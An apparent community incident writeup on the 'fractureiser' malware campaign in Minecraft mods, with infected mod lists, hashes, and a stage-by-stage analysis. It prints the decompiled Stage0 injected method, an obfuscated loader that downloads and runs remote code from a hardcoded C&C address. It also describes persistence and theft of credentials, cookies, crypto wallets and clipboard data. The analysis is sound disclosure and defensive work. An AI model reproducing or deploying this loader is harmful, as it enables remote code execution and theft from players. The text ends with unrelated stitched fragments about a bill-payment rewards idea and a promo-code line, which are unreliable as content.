Some modpacks have had updates published for them without the knowledge of the authors, adding a dependency on malicious mods. These modpack updates were archived immediately after uploading, meaning they do not show on the web UI, only via the API.
The malicious mods have upload dates multiple weeks in the past. Most of them were uploaded by single-use accounts with clearly autogenerated names, and were likely the seed of the infection. Luna Pixel Studios was compromised due to a dev testing one of these mods, as it was an interesting new upload. The fact Curse let these mods uploaded by a new account through is pretty bad and speaks to their now-nonexistent content moderation.

Known affected mods & plugins

mod/pluginlinkSHA1“Uploader” Skyblock Core[www.curseforge.com]/minecraft/mc-mods/skyblock-core/files/4570565

33677CA0E4C565B1F34BAA74A79C09A3B690BF41

Luna Pixel Studios Dungeonz[legacy.curseforge.com]/minecraft/mc-mods/dungeonx/files/4551100

2DB855A7F40C015F8C9CA7CBAB69E1F1AAFA210B

fractureiser Haven Elytra[dev.bukkit.org]/projects/havenelytra/files/4551105 [legacy.curseforge.com]/minecraft/bukkit-plugins/havenelytra/files/4551105

284A4449E58868036B2BAFDFB5A210FD0480EF4A

fractureiser Vault Integrations[www.curseforge.com]/minecraft/mc-mods/vault-integrations-bug-fix/files/4557590

0C6576BDC6D1B92D581C18F3A150905AD97FA080

simpleharvesting82 AutoBroadcast[www.curseforge.com]/minecraft/mc-mods/autobroadcast/files/4567257

C55C3E9D6A4355F36B0710AB189D5131A290DF26

shyandlostboy81 Museum Curator Advanced[www.curseforge.com]/minecraft/mc-mods/museum-curator-advanced/files/4553353

32536577D5BB074ABD493AD98DC12CCC86F30172

racefd16Vault Integrations Bug fix[www.curseforge.com]/minecraft/mc-mods/vault-integrations-bug-fix/files/4557590

0C6576BDC6D1B92D581C18F3A150905AD97FA080

simplyharvesting82 Floating Damage[dev.bukkit.org]/projects/floating-damage1d1aaccdc13244e980c0c024610ecc77ea2674a33a52129edf1bb4ce3b2cc2fcmamavergas3001Display Entity Editor[www.curseforge.com]/minecraft/bukkit-plugins/display-entity-editofiles/4570122

A4B6385D1140C111549D95EAB25CB51922EEFBA2

santa_faust_2120
Darkhax sent this: https://gist.github.com/Darkhax/d7f6d1b5bfb51c3c74d3bd1609cab51f
potentially more: Sophisticated Core, Dramatic Doors, Moonlight lib, Union lib

Stage0 (Infected mod jars)

Affected mods or plugins have a new static void method inserted into their main class, and a call to this method is inserted into that class’s static initializer. For DungeonZ, the method is named _d1385bd3c36f464882460aa4f0484c53 and exists in net.dungeonz.DungeonzMain . For Skyblock Core, the method is named _f7dba6a3a72049a78a308a774a847180 and is inserted into com.bmc.coremod.BMCSkyblockCore . For HavenElytra, the code is inserted directly into the otherwise-unused static initializer of valorless.havenelytra.HavenElytra .
The method’s code is obfuscated, using new String(new byte[]{...}) instead of string literals.
From Shadowex3’s sample of “Create Infernal Expansion Plus”, a copycat version of “Create Infernal Expansion Compat” with malware inserted into the main mod class:

static void _1685f49242dd46ef9c553d8af1a4e0bb() { Class.forName(new String(new byte[] { // "Utility" 85, 116, 105, 108, 105, 116, 121 }), true, (ClassLoader) Class.forName(new String(new byte[] { // "java.net.URLClassLoader" 106, 97, 118, 97, 46, 110, 101, 116, 46, 85, 82, 76, 67, 108, 97, 115, 115, 76, 111, 97, 100, 101, 114 })).getConstructor(URL[].class).newInstance(new URL[] { new URL(new String(new byte[] { // "http" 104, 116, 116, 112 }), new String(new byte[] { // "85.217.144.130" 56, 53, 46, 50, 49, 55, 46, 49, 52, 52, 46, 49, 51, 48 }), 8080, new String(new byte[] { // "/dl" 47, 100, 108 })) })).getMethod(new String(new byte[] { // "run" 114, 117, 110 }), String.class).invoke((Object) null, "-114.-18.38.108.-100"); }

This:

Creates a URLClassLoader with the URL http://[85.217.144.130:8080]/dl (shodan)
Loads the class Utility from the classloader, fetching code from the internet
Calls the run method on Utility , passing a String argument different for each infected mod (!). E.g.

Skyblock Core: “-74.-10.78.-106.12 ”
Dungeonz: “114.-18.38.108.-100 ”
HavenElytra: “-114.-18.38.108.-100 ”
Vault Integrations: “-114.-18.38.108.-100 ”

The passed numerals are parsed as bytes by Stage1 and written to a file named “.ref”. They appear to be a way for the author to track infection sources.
The creation of the classloader is hardcoded to that URL and does not use the Cloudflare URL that Stage 1 does. As that IP is now offline, this means the Stage 0 payloads we are presently aware of no longer function.

Stage1 (dl.jar)

SHA-1: dc43c4685c3f47808ac207d1667cc1eb915b2d82
Decompiled copy of Utility from the malware.
The very first thing Utility.run does is check if the system property neko.run is set. If it is, it will immediately stop executing. If not, it sets it to the empty string and continues. This appears to be a very simplistic way of avoiding the same process running the malware multiple times, such as if it had multiple infected mods. This cannot be relied upon as a killswitch because Stage1 is downloaded from the Internet and may change.
It attempts to contact 85.217.144.130 , and a Cloudflare Pages domain (https://[files-8ie.pages.dev]/ip ). Yes, people have already reported abuse. The Pages domain is used to retrieve the IP of the C&C server if the first IP no longer responds — the URL responds with a 4 byte file which is just a binary IPv4 address.
The C&C IP has been nullrouted after an abuse report to the server provider. We will need to keep an eye on the Cloudflare page to see if a new C&C server is stood up, I can’t imagine they didn’t plan for this. Thank you Serverion for your prompt response.
Stage 1 then attempts to achieve persistence by doing the following:

Downloading stage 2 (lib.jar on Linux, libWebGL64.jar on Windows) from the server
Making stage 2 run automatically on startup:

On Linux, it tries placing systemd unit files in /etc/systemd/system or ~/.config/systemd/user
- The unit file it places in the user folder never works, because it tries using multi-user.target , which doesn’t exist for user units
On Windows, it attempts to modify the registry to start itself, or failing that, tries adding itself to the Windows\Start Menu\Programs\Startup folder

Stage2 (lib.jar or libWebGL64.jar)

Known sha1 hashes:

52d08736543a240b0cbbbf2da03691ae525bb119
6ec85c8112c25abe4a71998eb32480d266408863 (Shadowex3’s earlier upload)

Stage 2 is obfuscated with a demo version of the Allatori obfuscator, and its main class is called Bootstrap .
TODO, describe the double wrapped behaviour.
Stage 2 downloads stage 3, client.jar , loads its code, and executes the start method located within dev.neko.nekoclient.Client .

Stage3 (client.jar)

sha-1: c2d0c87a1fe99e3c44a52c48d8bcf65a67b3e9a5
client.jar is an incredibly obfuscated and complex bundle of code and contains both java and native code.
It appears to contain a native payload hook.dll , decompiled: https://gist.githubusercontent.com/NotNite/79ab1e5501e1ef109e8030059356b1b8/raw/c2102bf5ff74275ac44c2200d5121bfff652fd49/hook.dll.c
There are two native functions meant to be called from Java, as they are JNI callable:

__int64 __fastcall Java_dev_neko_nekoclient_api_windows_WindowsHook_retrieveClipboardFiles(__int64 a1);
__int64 __fastcall Java_dev_neko_nekoclient_api_windows_WindowsHook_retrieveMSACredentials(__int64 a1);

from analysis, these do what they say on the tin:

read clipboard contents
Steal Microsoft account credentials

There is also evidence of code attempting to do the following:

Scan for all JAR files on the system that look like Minecraft mods (by detecting Forge/Fabric/Quilt/Bukkit) and attempt to inject stage 0 into them
Steal cookies and login information for many web browsers
Replace cryptocurrency addresses in the clipboard with alternates that are presumably owned by the attacker
Steal Discord credentials
Steal Microsoft and Minecraft credentials, from a variety of launchers
Steal crypto wallets

Jars are heuristically detected as Minecraft mods or plugins as follows:

Forge (dev/neko/e/e/e/A): The malware attempts to locate the u/Mod annotation, which is required in every mod
Bukkit (dev/neko/e/e/e/C): The malware checks if a class extends Bukkit’s JavaPlugin class
Fabric/Quilt (dev/neko/e/e/e/i): The malware checks if a class implements ModInitializer
Bungee (dev/neko/e/e/e/l): The malware checks if a class extends Bungee’s Plugin class
Vanilla (dev/neko/e/e/e/c): The malware checks if the main client class net.minecraft.client.main.Main exists

More details are available in the live stage-3 reversal doc: https://hackmd.io/5gqXVri5S4ewZcGaCbsJdQ

Other Stuff

The only official channel run by the same team that wrote this writeup is #cfmalware on EsperNet IRC — we do not have a Discord. You may join the channel if you wish — due to an influx of new users we’ve set the channel +m, you will need permission to speak. Joining an IRC channel will expose your IP address.
IRC logs: TODO
The main payload server is was (got taken down) hosted on Serverion, a company based in the Netherlands.
Other than an HTTP server on port 80/443 and an SSH server on port 22, the following ports were open on 85.217.144.130 :

1337
1338 (a port referenced in stage 1’s file for creating new Debugger connection)
8081 (this is a WebSocket server - no apparent function right now, not referenced in any malicious code)
8082 (nobody’s gotten anything out of this one, not referenced in any malicious code)
8083 (contacted by stage 1)

Curiously, fractureiser’s bukkit page says “Last active Sat, Jan, 1 2000 00:00:00” https://dev.bukkit.org/members/fractureiseprojects/

Follow-Ups

While it’s a bit early to speak of long term follow-ups, this whole debacle has brought up several critical flaws in the modded Minecraft ecosystem. This section is just brainstorming on them and how we can improve.

Review at mod repositories is inadequate What exactly does CurseForge and Modrinth do when “reviewing” a mod? We should know as a community, instead of relying on security through obscurity. Should be we be running some sort of static analysis? (williewillus has a few ideas here)
A lack of code signing for mods Unlike the software industry at large, mods released and uploaded to repositories are usually not signed with a signing key that proves that the owner of the key uploaded the mod. Having signing and a separate key distribution/trust mechanism mitigates compromise of CurseForge accounts. However, this then leads to the greater issue of how to derive key trust, as the fact that “this jar has this signature” has to be communicated out of band from CurseForge/Modrinth, in a standard way so that loaders or users can verify the signatures. Forge tried to introduce signing many years ago and it had limited uptake.
A lack of reproducible builds Minecraft toolchains are a mess, and builds are usually not reproducible. It is common to have buildscripts fetching unpinned -SNAPSHOT versions of random Gradle plugins and using them, which results in artifacts that are non-reproducible and thus non-auditable. A random Gradle plugin being a future attack vector is not out of the question.
Lack of sandboxing of Minecraft itself Java edition modding has always had the full power of Java, and this is the other side of that double-edged sword: malicious code has far-reaching impact. Minecraft itself is not run with any sandboxing, and servers usually are not sandboxed unless the owner is knowledgeable enough to do so.

Good sandboxing is difficult, especially on systems such as Linux where SELinux/AppArmor have such poor UX that no one deploys them.

Credits

Nonextensive! Thank you to all that pitched in. We’ll flesh this out after this all blows over.
Shadowex3: Extensive reverse engineering, early discovery learned of later Nia: Extensive stage 3 reverse engineering Jasmine: Coordination, writing the decompiler we’ve been using (Quiltflower) Emi: Coordination, initial discovery (for this team), and early research williewillus: Coordination, journalist quat: Documentation, initial infected sample research xylemlandmark: Coordination of documentation, crowd control, responsible for using Snopyta at first and the disaster that caused

Live updated document - https://hackmd.io/B46EYzKXSfWSF35DeCZz9A
Curseforge is aware of the issue keep an eye in their discord for announcements.

I just had a thought,
if let's say, you create an app that people can use to pay their bills then they can get certain amount if you meet minimum amount but in reality, they give you the money thru gcash or something in the backend, then you pay it via your cc, you get reward points, you get extra cash, and the other users get some cash back as well.
now that I think about it, UNOBank has this kind of promo :D you get 50php per month if you pay bills worth 1000.

Caviar promo code existing user

Postmates